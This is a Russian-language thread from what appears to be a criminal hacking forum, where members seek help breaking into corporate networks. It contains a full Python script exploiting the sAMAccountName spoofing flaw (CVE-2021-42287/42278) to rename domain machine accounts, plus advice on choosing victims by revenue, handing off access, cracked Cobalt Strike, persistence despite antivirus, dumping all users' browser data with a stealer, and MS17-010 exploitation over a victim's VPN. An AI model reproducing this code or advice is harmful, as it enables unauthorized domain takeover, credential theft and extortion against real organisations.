[net-hacking] Вопросы по сетям

[Aror]

Всем привет,подскажите где взять renameMachine.py,есть код на гите,но он не отрабатывает,может кто то сможет поделится ?Учетку добавил,все распологает к этому вектору,скрипт запускаю пишет версию ипакет и все на этом

 

[magically]

Всем привет,подскажите где взять renameMachine.py,есть код на гите,но он не отрабатывает,может кто то сможет поделится ?Учетку добавил,все распологает к этому вектору,скрипт запускаю пишет версию ипакет и все на этом

Не шарю, но чатгпт пишет чет подобное.

import os
import sys

def rename_machine(new_name):
    try:
        # Определяем текущий компьютер
        current_name = os.environ['COMPUTERNAME']
        print(f"Текущее имя компьютера: {current_name}")

        # Устанавливаем новое имя
        os.system(f"wmic computersystem where name='{current_name}' rename '{new_name}'")
        print(f"Имя компьютера изменено на: {new_name}")
    except Exception as e:
        print(f"Ошибка: {e}")

if __name__ == "__main__":
    if len(sys.argv) != 2:
        print("Используйте: python renameMachine.py <новое_имя>")
    else:
        new_name = sys.argv[1]
        rename_machine(new_name)

 

[rand]

Не шарю, но чатгпт пишет чет подобное.

import os
import sys

def rename_machine(new_name):
    try:
        # Определяем текущий компьютер
        current_name = os.environ['COMPUTERNAME']
        print(f"Текущее имя компьютера: {current_name}")

        # Устанавливаем новое имя
        os.system(f"wmic computersystem where name='{current_name}' rename '{new_name}'")
        print(f"Имя компьютера изменено на: {new_name}")
    except Exception as e:
        print(f"Ошибка: {e}")

if __name__ == "__main__":
    if len(sys.argv) != 2:
        print("Используйте: python renameMachine.py <новое_имя>")
    else:
        new_name = sys.argv[1]
        rename_machine(new_name)

Ну делать это петухоном что из пушки по воробьям стрелять=) По сути это выполнение команды:

wmic computersystem where name="%computername%" call rename name="lolhack"

Всем привет,подскажите где взять renameMachine.py,есть код на гите,но он не отрабатывает,может кто то сможет поделится ?Учетку добавил,все распологает к этому вектору,скрипт запускаю пишет версию ипакет и все на этом

Покажи код. =)

 

[magically]

Какие способы используют хакеры для поиска достойных сетей Cisco/FortiVPN? в какой момент передается доступ в отработку допустим другому человек? как узнать ревеню корпы?

 

[BLUA]

Какие способы используют хакеры для поиска достойных сетей Cisco/FortiVPN? в какой момент передается доступ в отработку допустим другому человек? как узнать ревеню корпы?

Ну как искать ревенью, ты можешь узнать на форуме, вот из свежих статей на эту тему кстати -> https://xssforum7mmh3n56inuf2h73hvhnzobi7h2ytb3gvklrfqm7ut3xdnyd.onion/threads/125329/

Експлойты/Фишинг -> т.е. ты либо используешь уязвимости в оборудовании/ПО, либо заходишь с другой двери - соц.инженерия и фишинг...

 

[Dobryi]

не рекомендую юзать кобу если не хочешь сесть на бутылку

Можно пояснительную неофиту?

Если в пм ответили, то поделитесь, пожалуйста, тоже интересно почитать объяснение

 

[apdcx0]

Если в пм ответили, то поделитесь, пожалуйста, тоже интересно почитать объяснение

+ Тоже очень интересно

 

[lolka228]

Если в пм ответили, то поделитесь, пожалуйста, тоже интересно почитать объяснение

Не ответа не было, возможно он и сам не знает а просто пизданул, просто я уже видел подобные сообщения, но тоже без пруфов.

 

[Aror]

Ну делать это петухоном что из пушки по воробьям стрелять=) По сути это выполнение команды:

wmic computersystem where name="%computername%" call rename name="lolhack"

Покажи код. =)

#!/usr/bin/env python3

import argparse
import logging
import sys
import ldap3
import ssl
import ldapdomaindump

from impacket import version
from impacket.examples import logger, utils
from impacket.smbconnection import SMBConnection
from ldap3.utils.conv import escape_filter_chars


def get_machine_name(args, domain):
if args.dc_ip is not None:
s = SMBConnection(args.dc_ip, args.dc_ip)
else:
s = SMBConnection(domain, domain)
try:
s.login('', '')
except Exception:
if s.getServerName() == '':
raise Exception('Error while anonymous logging into %s' % domain)
else:
s.logoff()
return s.getServerName()


def init_ldap_connection(target, tls_version, args, domain, username, password, lmhash, nthash):
user = '%s\\%s' % (domain, username)
if tls_version is not None:
use_ssl = True
port = 636
tls = ldap3.Tls(validate=ssl.CERT_NONE, version=tls_version)
else:
use_ssl = False
port = 389
tls = None
ldap_server = ldap3.Server(target, get_info=ldap3.ALL, port=port, use_ssl=use_ssl, tls=tls)
if args.k:
ldap_session = ldap3.Connection(ldap_server)
ldap_session.bind()
ldap3_kerberos_login(ldap_session, target, username, password, domain, lmhash, nthash, args.aesKey, kdcHost=args.dc_ip)
elif args.hashes is not None:
ldap_session = ldap3.Connection(ldap_server, user=user, password=lmhash + ":" + nthash, authentication=ldap3.NTLM, auto_bind=True)
else:
ldap_session = ldap3.Connection(ldap_server, user=user, password=password, authentication=ldap3.NTLM, auto_bind=True)

return ldap_server, ldap_session


def init_ldap_session(args, domain, username, password, lmhash, nthash):
if args.k:
target = get_machine_name(args, domain)
else:
if args.dc_ip is not None:
target = args.dc_ip
else:
target = domain

if args.use_ldaps is True:
try:
return init_ldap_connection(target, ssl.PROTOCOL_TLSv1_2, args, domain, username, password, lmhash, nthash)
except ldap3.core.exceptions.LDAPSocketOpenError:
return init_ldap_connection(target, ssl.PROTOCOL_TLSv1, args, domain, username, password, lmhash, nthash)
else:
return init_ldap_connection(target, None, args, domain, username, password, lmhash, nthash)


def parse_identity(args):
domain, username, password = utils.parse_credentials(args.identity)

if domain == '':
logging.critical('Domain should be specified!')
sys.exit(1)

if password == '' and username != '' and args.hashes is None and args.no_pass is False and args.aesKey is None:
from getpass import getpass
logging.info("No credentials supplied, supply password")
password = getpass("Password:")

if args.aesKey is not None:
args.k = True

if args.hashes is not None:
lmhash, nthash = args.hashes.split(':')
else:
lmhash = ''
nthash = ''

return domain, username, password, lmhash, nthash


def init_logger(args):
# Init the example's logger theme and debug level
logger.init(args.ts)
if args.debug is True:
logging.getLogger().setLevel(logging.DEBUG)
# Print the Library's installation path
logging.debug(version.getInstallationPath())
else:
logging.getLogger().setLevel(logging.INFO)
logging.getLogger('impacket.smbserver').setLevel(logging.ERROR)


def parse_args():
parser = argparse.ArgumentParser(add_help=True,
description='Python setter for property sAMAccountName for CVE-2021-42287/CVE-2021-42278')
parser.add_argument('identity', action='store', help='domain.local/username[:password]')
parser.add_argument("-current-name", type=str, required=True, help="Target computer account to be renamed")
parser.add_argument("-new-name", type=str, required=True, help="New name for the target machine")

parser.add_argument('-use-ldaps', action='store_true', help='Use LDAPS instead of LDAP')

parser.add_argument('-ts', action='store_true', help='Adds timestamp to every logging output')
parser.add_argument('-debug', action='store_true', help='Turn DEBUG output ON')

group = parser.add_argument_group('authentication')
group.add_argument('-hashes', action="store", metavar="LMHASH:NTHASH", help='NTLM hashes, format is LMHASH:NTHASH')
group.add_argument('-no-pass', action="store_true", help='don\'t ask for password (useful for -k)')
group.add_argument('-k', action="store_true",
help='Use Kerberos authentication. Grabs credentials from ccache file '
'(KRB5CCNAME) based on target parameters. If valid credentials '
'cannot be found, it will use the ones specified in the command '
'line')
group.add_argument('-aesKey', action="store", metavar="hex key", help='AES key to use for Kerberos Authentication '
'(128 or 256 bits)')

group = parser.add_argument_group('connection')

group.add_argument('-dc-ip', action='store', metavar="ip address",
help='IP Address of the domain controller or KDC (Key Distribution Center) for Kerberos. If '
'omitted it will use the domain part (FQDN) specified in '
'the identity parameter')

if len(sys.argv) == 1:
parser.print_help()
sys.exit(1)

return parser.parse_args()


def get_user_info(samname, ldap_session, domain_dumper):
ldap_session.search(domain_dumper.root, '(sAMAccountName=%s)' % escape_filter_chars(samname), attributes=['objectSid'])
try:
dn = ldap_session.entries[0].entry_dn
return dn
except IndexError:
logging.error('Machine not found in LDAP: %s' % samname)
return False


def main():
print(version.BANNER)
args = parse_args()
init_logger(args)

domain, username, password, lmhash, nthash = parse_identity(args)
if len(nthash) > 0 and lmhash == "":
lmhash = "aad3b435b51404eeaad3b435b51404ee"

ldap_server, ldap_session = init_ldap_session(args, domain, username, password, lmhash, nthash)

cnf = ldapdomaindump.domainDumpConfig()
cnf.basepath = None
domain_dumper = ldapdomaindump.domainDumper(ldap_server, ldap_session, cnf)

dn = get_user_info(args.current_name, ldap_session, domain_dumper)

ldap_session.modify(dn, {'servicePrincipalName': [ldap3.MODIFY_REPLACE, []]})
ldap_session.modify(dn, {'sAMAccountName': [ldap3.MODIFY_REPLACE, [args.new_name]]})

if ldap_session.result['result'] == 0:
logging.info('Target machine renamed successfully!')


if __name__ == '__main__':
main()

 

[Aror]

учетки компьютерные созданные распазнаются в домене все нормально,на это скрипте именно тупик
вектор подразумивался machineaccountquota

 

[Mkatzzzz666]

Можно пояснительную неофиту?

На форуме кто-то писал что кобу недолюбливают из-за возможного встроенного бэкдора.Не знаю это ли он имел ввиду.

 

[BLUA]

На форуме кто-то писал что кобу недолюбливают из-за возможного встроенного бэкдора.Не знаю это ли он имел ввиду.

Дак кобой все пользовались - кряком. В кряке соответственно может быть что-то вложено. Как хакеры могут делать "компрометацию поставки", почему бы таким же приёмом не сыграть после хакеров ? Только дотошные увидят, что коба творит какие-то "чудеса". Но всё-таки многие используют её, дело в том что коба это "закрытый" комерческий продукт, и ни какой-то опенсоурс, я тут недавно писал про то, что поведение опенсорс фреймворков уже знакомо безопасникам(https://xssforum7mmh3n56inuf2h73hvhnzobi7h2ytb3gvklrfqm7ut3xdnyd.onion/threads/124372/#post-876642 и https://xssforum7mmh3n56inuf2h73hvhnzobi7h2ytb3gvklrfqm7ut3xdnyd.onion/threads/123924/). Но коба тоже распиарина, и на старых версиях(а кряк есть только на неё) придётся повозиться с маяками. И поэтому выбирай то, как и кто тебя надудонит

 

[C0rtex]

Привет ребята, встречались у кого такие траблы заходишь в впн nslookup выдает инфу все норм но кроме 53 порта ничего нету не сканятся DC, и не пингуется сеть, не какие-либо хосты и как работать с таким пытался прописывать настройки в hosts тоже не помогает, буду рад почитать ответы мое предположение что firewall, а там возможно и что-то другое, vpn cisco, всем спасибо за участие в моем вопросе буду признателен за решение !

 

[DyadyaKepler]

Господа, приветствую.
Подскажите, чем можно закрепиться на виндовой системе?
Юзер без прав(нельзя ничего устанавливать), стоит ав(netcat спалил), выход в интернет есть - скачивать можно.
На ум конечно приходит что-то вроде атеры или прочих rmm, но хотелость бы что-то простенькое и селф-хостед, ну и бесплатное конечно-же.

 

[Aror]

Господа, приветствую.
Подскажите, чем можно закрепиться на виндовой системе?
Юзер без прав(нельзя ничего устанавливать), стоит ав(netcat спалил), выход в интернет есть - скачивать можно.
На ум конечно приходит что-то вроде атеры или прочих rmm, но хотелость бы что-то простенькое и селф-хостед, ну и бесплатное конечно-же.

атеру без прав не поставишь

 

[Mkatzzzz666]

Приветствую,может кто подсказать каким образом можно сдампить браузеры сразу со всех юзеров на одной тачке?

 

[LLIyTka]

Приветствую,может кто подсказать каким образом можно сдампить браузеры сразу со всех юзеров на одной тачке?

Запуском стилака от Локал админа или домена, ну если в стилак это прописано.

 

[Aror]

всем привет,такой вопрос прежде чем написать,перерыл все просторые интернета по данной проблеме
ms17 выдает ошибку fail,менялись нагрузкиб,проверись порты все что можно было проверить проверил все ровно (fail)
подразумеваю что виновен ав и много людей кто такого же мнения
может кто то с таким сталкивался ?сижу их под впн креды расподнаются как гостевые

 

[BLUA]

всем привет,такой вопрос прежде чем написать,перерыл все просторые интернета по данной проблеме
ms17 выдает ошибку fail,менялись нагрузкиб,проверись порты все что можно было проверить проверил все ровно (fail)
подразумеваю что виновен ав и много людей кто такого же мнения
может кто то с таким сталкивался ?сижу их под впн креды расподнаются как гостевые

Проверь свою нагрузку на стенде и посмотри что идёт не так

 

[Gidis]

Вопрос от новичка: У меня есть удаленный доступ к ПК (Fedora Linux). Подключен к локальной сети по кабелю, есть вайфай модуль. Как я могу получить доступ к другим ПК (скорее всего 10 винда) в этой же локальной сети?